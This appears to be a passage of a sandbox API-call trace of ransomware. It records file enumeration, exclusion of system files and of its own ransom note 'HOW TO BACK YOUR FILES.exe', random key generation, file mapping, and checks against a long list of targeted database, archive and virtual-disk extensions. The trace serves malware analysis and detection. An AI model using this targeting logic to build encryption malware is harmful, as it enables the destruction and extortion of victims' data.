GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=524288) returned 1 [0057.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0057.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0057.610] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0057.610] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0057.610] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.611] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x164 [0057.612] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0xb80000 [0057.637] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0057.637] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0057.638] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0057.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0057.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.638] UnmapViewOfFile (lpBaseAddress=0xb80000) returned 1 [0057.643] CloseHandle (hObject=0x164) returned 1 [0057.643] CloseHandle (hObject=0x15c) returned 1 [0057.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.679] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8deeffb, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8deeffb, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="aoldtz.exe") returned 1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="windows") returned -1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="bootmgr") returned 1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="temp") returned -1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="pagefile.sys") returned -1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="boot") returned 1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="ids.txt") returned 1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat") returned 1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="perflogs") returned -1 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="MSBuild") returned 1 [0057.679] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0057.679] lstrlenW (lpString="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 114 [0057.679] lstrcpyW (in: lpString1=0x2cce42c, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0057.679] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0057.679] lstrlenW (lpString="Ares865") returned 7 [0057.679] lstrcmpiW (lpString1="rans-ms", lpString2="Ares865") returned 1 [0057.679] lstrlenW (lpString=".dll") returned 4 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".dll") returned 1 [0057.679] lstrlenW (lpString=".lnk") returned 4 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".lnk") returned 1 [0057.679] lstrlenW (lpString=".ini") returned 4 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".ini") returned 1 [0057.679] lstrlenW (lpString=".sys") returned 4 [0057.679] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".sys") returned 1 [0057.679] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0057.679] lstrlenW (lpString="bak") returned 3 [0057.679] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0057.679] lstrlenW (lpString="ba_") returned 3 [0057.679] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0057.679] lstrlenW (lpString="dbb") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0057.680] lstrlenW (lpString="vmdk") returned 4 [0057.680] lstrcmpiW (lpString1="s-ms", lpString2="vmdk") returned -1 [0057.680] lstrlenW (lpString="rar") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0057.680] lstrlenW (lpString="zip") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0057.680] lstrlenW (lpString="tgz") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0057.680] lstrlenW (lpString="vbox") returned 4 [0057.680] lstrcmpiW (lpString1="s-ms", lpString2="vbox") returned -1 [0057.680] lstrlenW (lpString="vdi") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0057.680] lstrlenW (lpString="vhd") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0057.680] lstrlenW (lpString="vhdx") returned 4 [0057.680] lstrcmpiW (lpString1="s-ms", lpString2="vhdx") returned -1 [0057.680] lstrlenW (lpString="avhd") returned 4 [0057.680] lstrcmpiW (lpString1="s-ms", lpString2="avhd") returned 1 [0057.680] lstrlenW (lpString="db") returned 2 [0057.680] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0057.680] lstrlenW (lpString="db2") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0057.680] lstrlenW (lpString="db3") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0057.680] lstrlenW (lpString="dbf") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0057.680] lstrlenW (lpString="mdf") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0057.680] lstrlenW (lpString="mdb") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0057.680] lstrlenW (lpString="sql") returned 3 [0057.680] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0057.680] lstrlenW (lpString="sqlite") returned 6 [0057.680] lstrcmpiW (lpString1="ans-ms", lpString2="sqlite") returned -1 [0057.680] lstrlenW (lpString="sqlite3") returned 7 [0057.680] lstrcmpiW (lpString1="rans-ms", lpString2="sqlite3") returned -1 [0057.680] lstrlenW (lpString="sqlitedb") returned 8 [0057.680] lstrcmpiW (lpString1="trans-ms", lpString2="sqlitedb") returned 1 [0057.681] lstrlenW (lpString="xml") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0057.681] lstrlenW (lpString="$er") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0057.681] lstrlenW (lpString="4dd") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0057.681] lstrlenW (lpString="4dl") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0057.681] lstrlenW (lpString="^^^") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0057.681] lstrlenW (lpString="abs") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0057.681] lstrlenW (lpString="abx") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0057.681] lstrlenW (lpString="accdb") returned 5 [0057.681] lstrcmpiW (lpString1="ns-ms", lpString2="accdb") returned 1 [0057.681] lstrlenW (lpString="accdc") returned 5 [0057.681] lstrcmpiW (lpString1="ns-ms", lpString2="accdc") returned 1 [0057.681] lstrlenW (lpString="accde") returned 5 [0057.681] lstrcmpiW (lpString1="ns-ms", lpString2="accde") returned 1 [0057.681] lstrlenW (lpString="accdr") returned 5 [0057.681] lstrcmpiW (lpString1="ns-ms", lpString2="accdr") returned 1 [0057.681] lstrlenW (lpString="accdt") returned 5 [0057.681] lstrcmpiW (lpString1="ns-ms", lpString2="accdt") returned 1 [0057.681] lstrlenW (lpString="accdw") returned 5 [0057.681] lstrcmpiW (lpString1="ns-ms", lpString2="accdw") returned 1 [0057.681] lstrlenW (lpString="accft") returned 5 [0057.681] lstrcmpiW (lpString1="ns-ms", lpString2="accft") returned 1 [0057.681] lstrlenW (lpString="adb") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0057.681] lstrlenW (lpString="adb") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0057.681] lstrlenW (lpString="ade") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0057.681] lstrlenW (lpString="adf") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0057.681] lstrlenW (lpString="adn") returned 3 [0057.681] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0057.682] lstrlenW (lpString="adp") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0057.682] lstrlenW (lpString="alf") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0057.682] lstrlenW (lpString="ask") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0057.682] lstrlenW (lpString="btr") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0057.682] lstrlenW (lpString="cat") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0057.682] lstrlenW (lpString="cdb") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0057.682] lstrlenW (lpString="ckp") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0057.682] lstrlenW (lpString="cma") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0057.682] lstrlenW (lpString="cpd") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0057.682] lstrlenW (lpString="dacpac") returned 6 [0057.682] lstrcmpiW (lpString1="ans-ms", lpString2="dacpac") returned -1 [0057.682] lstrlenW (lpString="dad") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0057.682] lstrlenW (lpString="dadiagrams") returned 10 [0057.682] lstrcmpiW (lpString1="egtrans-ms", lpString2="dadiagrams") returned 1 [0057.682] lstrlenW (lpString="daschema") returned 8 [0057.682] lstrcmpiW (lpString1="trans-ms", lpString2="daschema") returned 1 [0057.682] lstrlenW (lpString="db-journal") returned 10 [0057.682] lstrcmpiW (lpString1="egtrans-ms", lpString2="db-journal") returned 1 [0057.682] lstrlenW (lpString="db-shm") returned 6 [0057.682] lstrcmpiW (lpString1="ans-ms", lpString2="db-shm") returned -1 [0057.682] lstrlenW (lpString="db-wal") returned 6 [0057.682] lstrcmpiW (lpString1="ans-ms", lpString2="db-wal") returned -1 [0057.682] lstrlenW (lpString="dbc") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0057.682] lstrlenW (lpString="dbs") returned 3 [0057.682] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0057.682] lstrlenW (lpString="dbt") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0057.683] lstrlenW (lpString="dbv") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0057.683] lstrlenW (lpString="dbx") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0057.683] lstrlenW (lpString="dcb") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0057.683] lstrlenW (lpString="dct") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0057.683] lstrlenW (lpString="dcx") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0057.683] lstrlenW (lpString="ddl") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0057.683] lstrlenW (lpString="dlis") returned 4 [0057.683] lstrcmpiW (lpString1="s-ms", lpString2="dlis") returned 1 [0057.683] lstrlenW (lpString="dp1") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0057.683] lstrlenW (lpString="dqy") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0057.683] lstrlenW (lpString="dsk") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0057.683] lstrlenW (lpString="dsn") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0057.683] lstrlenW (lpString="dtsx") returned 4 [0057.683] lstrcmpiW (lpString1="s-ms", lpString2="dtsx") returned 1 [0057.683] lstrlenW (lpString="dxl") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0057.683] lstrlenW (lpString="eco") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0057.683] lstrlenW (lpString="ecx") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0057.683] lstrlenW (lpString="edb") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0057.683] lstrlenW (lpString="epim") returned 4 [0057.683] lstrcmpiW (lpString1="s-ms", lpString2="epim") returned 1 [0057.683] lstrlenW (lpString="fcd") returned 3 [0057.683] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0057.684] lstrlenW (lpString="fdb") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0057.684] lstrlenW (lpString="fic") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0057.684] lstrlenW (lpString="flexolibrary") returned 12 [0057.684] lstrcmpiW (lpString1=".regtrans-ms", lpString2="flexolibrary") returned -1 [0057.684] lstrlenW (lpString="fm5") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0057.684] lstrlenW (lpString="fmp") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0057.684] lstrlenW (lpString="fmp12") returned 5 [0057.684] lstrcmpiW (lpString1="ns-ms", lpString2="fmp12") returned 1 [0057.684] lstrlenW (lpString="fmpsl") returned 5 [0057.684] lstrcmpiW (lpString1="ns-ms", lpString2="fmpsl") returned 1 [0057.684] lstrlenW (lpString="fol") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0057.684] lstrlenW (lpString="fp3") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0057.684] lstrlenW (lpString="fp4") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0057.684] lstrlenW (lpString="fp5") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0057.684] lstrlenW (lpString="fp7") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0057.684] lstrlenW (lpString="fpt") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0057.684] lstrlenW (lpString="frm") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0057.684] lstrlenW (lpString="gdb") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0057.684] lstrlenW (lpString="gdb") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0057.684] lstrlenW (lpString="grdb") returned 4 [0057.684] lstrcmpiW (lpString1="s-ms", lpString2="grdb") returned 1 [0057.684] lstrlenW (lpString="gwi") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0057.684] lstrlenW (lpString="hdb") returned 3 [0057.684] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0057.685] lstrlenW (lpString="his") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0057.685] lstrlenW (lpString="ib") returned 2 [0057.685] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0057.685] lstrlenW (lpString="idb") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0057.685] lstrlenW (lpString="ihx") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0057.685] lstrlenW (lpString="itdb") returned 4 [0057.685] lstrcmpiW (lpString1="s-ms", lpString2="itdb") returned 1 [0057.685] lstrlenW (lpString="itw") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0057.685] lstrlenW (lpString="jet") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0057.685] lstrlenW (lpString="jtx") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0057.685] lstrlenW (lpString="kdb") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0057.685] lstrlenW (lpString="kexi") returned 4 [0057.685] lstrcmpiW (lpString1="s-ms", lpString2="kexi") returned 1 [0057.685] lstrlenW (lpString="kexic") returned 5 [0057.685] lstrcmpiW (lpString1="ns-ms", lpString2="kexic") returned 1 [0057.685] lstrlenW (lpString="kexis") returned 5 [0057.685] lstrcmpiW (lpString1="ns-ms", lpString2="kexis") returned 1 [0057.685] lstrlenW (lpString="lgc") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0057.685] lstrlenW (lpString="lwx") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0057.685] lstrlenW (lpString="maf") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0057.685] lstrlenW (lpString="maq") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0057.685] lstrlenW (lpString="mar") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0057.685] lstrlenW (lpString="marshal") returned 7 [0057.685] lstrcmpiW (lpString1="rans-ms", lpString2="marshal") returned 1 [0057.685] lstrlenW (lpString="mas") returned 3 [0057.685] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0057.685] lstrlenW (lpString="mav") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0057.686] lstrlenW (lpString="maw") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0057.686] lstrlenW (lpString="mdbhtml") returned 7 [0057.686] lstrcmpiW (lpString1="rans-ms", lpString2="mdbhtml") returned 1 [0057.686] lstrlenW (lpString="mdn") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0057.686] lstrlenW (lpString="mdt") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0057.686] lstrlenW (lpString="mfd") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0057.686] lstrlenW (lpString="mpd") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0057.686] lstrlenW (lpString="mrg") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0057.686] lstrlenW (lpString="mud") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0057.686] lstrlenW (lpString="mwb") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0057.686] lstrlenW (lpString="myd") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0057.686] lstrlenW (lpString="ndf") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0057.686] lstrlenW (lpString="nnt") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0057.686] lstrlenW (lpString="nrmlib") returned 6 [0057.686] lstrcmpiW (lpString1="ans-ms", lpString2="nrmlib") returned -1 [0057.686] lstrlenW (lpString="ns2") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0057.686] lstrlenW (lpString="ns3") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0057.686] lstrlenW (lpString="ns4") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0057.686] lstrlenW (lpString="nsf") returned 3 [0057.686] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0057.686] lstrlenW (lpString="nv") returned 2 [0057.686] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0057.687] lstrlenW (lpString="nv2") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0057.687] lstrlenW (lpString="nwdb") returned 4 [0057.687] lstrcmpiW (lpString1="s-ms", lpString2="nwdb") returned 1 [0057.687] lstrlenW (lpString="nyf") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0057.687] lstrlenW (lpString="odb") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0057.687] lstrlenW (lpString="odb") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0057.687] lstrlenW (lpString="oqy") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0057.687] lstrlenW (lpString="ora") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0057.687] lstrlenW (lpString="orx") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0057.687] lstrlenW (lpString="owc") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0057.687] lstrlenW (lpString="p96") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0057.687] lstrlenW (lpString="p97") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0057.687] lstrlenW (lpString="pan") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0057.687] lstrlenW (lpString="pdb") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0057.687] lstrlenW (lpString="pdm") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0057.687] lstrlenW (lpString="pnz") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0057.687] lstrlenW (lpString="qry") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0057.687] lstrlenW (lpString="qvd") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0057.687] lstrlenW (lpString="rbf") returned 3 [0057.687] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0057.687] lstrlenW (lpString="rctd") returned 4 [0057.687] lstrcmpiW (lpString1="s-ms", lpString2="rctd") returned 1 [0057.687] lstrlenW (lpString="rod") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0057.688] lstrlenW (lpString="rodx") returned 4 [0057.688] lstrcmpiW (lpString1="s-ms", lpString2="rodx") returned 1 [0057.688] lstrlenW (lpString="rpd") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0057.688] lstrlenW (lpString="rsd") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0057.688] lstrlenW (lpString="sas7bdat") returned 8 [0057.688] lstrcmpiW (lpString1="trans-ms", lpString2="sas7bdat") returned 1 [0057.688] lstrlenW (lpString="sbf") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0057.688] lstrlenW (lpString="scx") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0057.688] lstrlenW (lpString="sdb") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0057.688] lstrlenW (lpString="sdc") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0057.688] lstrlenW 